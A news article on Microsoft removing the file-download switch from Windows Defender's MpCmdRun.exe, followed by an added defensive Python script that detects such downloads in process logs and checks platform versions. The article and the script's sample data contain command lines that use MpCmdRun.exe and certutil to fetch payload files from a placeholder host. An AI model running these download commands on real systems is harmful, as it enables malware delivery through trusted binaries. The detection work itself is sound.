Microsoft removed the file download command in Windows Defender Antivirus
Microsoft removed the ability to download files using Windows Defender after demonstrating how attackers can use this functionality to deliver malware to a computer.
We reported some time ago how Microsoft, without explanation, quietly added the ability to download files using Microsoft Defender.
Following this, the cybersecurity research community expressed concern that Microsoft had turned the built-in Windows 10 antivirus into yet another LOLBIN (a "living off the land binary": a legitimate, signed OS file that attackers can repurpose for malicious ends).
“With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers,” BleepingComputer wrote.
To download a file, the antivirus command-line utility (MpCmdRun.exe) was invoked with the -DownloadFile argument, for example:
MpCmdRun.exe -DownloadFile -url [URL] -path [path to save file]
In BleepingComputer's tests, the researchers were able to download arbitrary files, including ransomware, onto a system this way.
If Microsoft Defender is active, it quickly detects the downloaded payload, but on a machine running a third-party antivirus the download may go unnoticed.
Asked by BleepingComputer, Microsoft declined to explain why the functionality had been added at all.
On September 17, Microsoft updated the antimalware platform to version 4.18.2009.2-0 and changed the behavior of the MpCmdRun.exe utility once again.
This time the company removed the ability to download files with the MpCmdRun.exe command-line tool.
Users who try to download a file with MpCmdRun.exe now receive the error:
CmdTool: Invalid command line argument
The -DownloadFile switch has also been removed from the utility's help output.
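The two practical questions a defender is left with after the abuse described above and the fix that followed are whether any endpoint already recorded such a download and whether a given machine still carries the vulnerable platform build. The following added example (written for this rewrite; it is not code from the original article, from BleepingComputer, or from Microsoft) shows both checks: a parser that flags MpCmdRun.exe -DownloadFile invocations in process command lines and extracts the URL and save path, and a version comparison against the 4.18.2009.2 build the article names as the one that removed the switch. It assumes the command lines come from Windows process-creation telemetry such as Sysmon Event ID 1 or Security event 4688; the sample command lines and the 192.0.2.10 addresses are constructed for the example.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample process-creation command lines (not real telemetry).
# Lines 1 and 2 are MpCmdRun.exe downloads in two casings/quoting styles;
# line 3 is a benign Defender scan; line 4 is a different LOLBIN (certutil).
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url http://192.0.2.10/payload.bin -path C:\Users\Public\payload.bin',
    r'MpCmdRun.exe -downloadfile -url http://192.0.2.10/a.exe -path "C:\Users\Public\Temp Dir\a.exe"',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'C:\Windows\System32\certutil.exe -urlcache -split -f http://192.0.2.10/x.exe x.exe',
]

# Antimalware platform version in which, per the article, -DownloadFile was removed.
REMOVAL_VERSION = (4, 18, 2009, 2)

# Switches are matched case-insensitively: MpCmdRun.exe does not care about case,
# so neither should the detection.
DOWNLOAD_SWITCH = re.compile(r"(?i)(?:^|\s)-DownloadFile(?=\s|$)")
URL_ARG = re.compile(r'(?i)(?:^|\s)-url\s+("[^"]*"|\S+)')
PATH_ARG = re.compile(r'(?i)(?:^|\s)-path\s+("[^"]*"|\S+)')


class DownloadAttempt(NamedTuple):
    url: str   # remote URL passed to -url ("" if absent)
    path: str  # local save path passed to -path ("" if absent)


def _image_name(cmdline: str) -> str:
    """Return the lower-cased file name of the first token (the executable), honoring a quoted path."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        image = s[1:end] if end > 0 else s[1:]
    else:
        image = s.split(None, 1)[0] if s else ""
    return image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def parse_mpcmdrun_download(cmdline: str) -> Optional[DownloadAttempt]:
    """Return the URL and save path if cmdline is MpCmdRun.exe invoked with -DownloadFile, else None."""
    if _image_name(cmdline) != "mpcmdrun.exe":
        return None
    if not DOWNLOAD_SWITCH.search(cmdline):
        return None
    url = URL_ARG.search(cmdline)
    path = PATH_ARG.search(cmdline)
    return DownloadAttempt(
        url=url.group(1).strip('"') if url else "",
        path=path.group(1).strip('"') if path else "",
    )


def find_download_attempts(cmdlines: List[str]) -> List[Tuple[str, DownloadAttempt]]:
    """Scan a batch of command lines and return every MpCmdRun.exe download with its parsed arguments."""
    hits = []
    for cl in cmdlines:
        attempt = parse_mpcmdrun_download(cl)
        if attempt is not None:
            hits.append((cl, attempt))
    return hits


def download_switch_removed(platform_version: str) -> bool:
    """True if the antimalware platform version (e.g. '4.18.2009.2-0') is at or past the build that removed -DownloadFile."""
    core = platform_version.split("-", 1)[0]          # drop the '-0' suffix style used by Microsoft
    parts = tuple(int(p) for p in core.split("."))
    return parts >= REMOVAL_VERSION


if __name__ == "__main__":
    for cl, attempt in find_download_attempts(SAMPLE_COMMAND_LINES):
        print(f"MpCmdRun download: {attempt.url} -> {attempt.path}")
    for v in ("4.18.2008.9", "4.18.2009.2-0"):
        print(v, "switch removed" if download_switch_removed(v) else "switch may still be present")
```

Note that a platform build older than 4.18.2009.2 is not proof that the switch is present, since the article does not say in which build it first appeared; the version check only tells you whether a host has received the removal.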
Attackers use whatever tools are already available to them, and prefer those the system trusts by default, such as signed native Windows binaries, since these rarely trigger alerts.
LOLBIN attacks are far from theoretical.
“For example, LOLBINs were used by the TA505 group to carry out attacks using ransomware and other types of malware,” information security experts said.
The removal of the download option from Windows Defender is good news, as it denies attackers one more avenue for compromising user systems.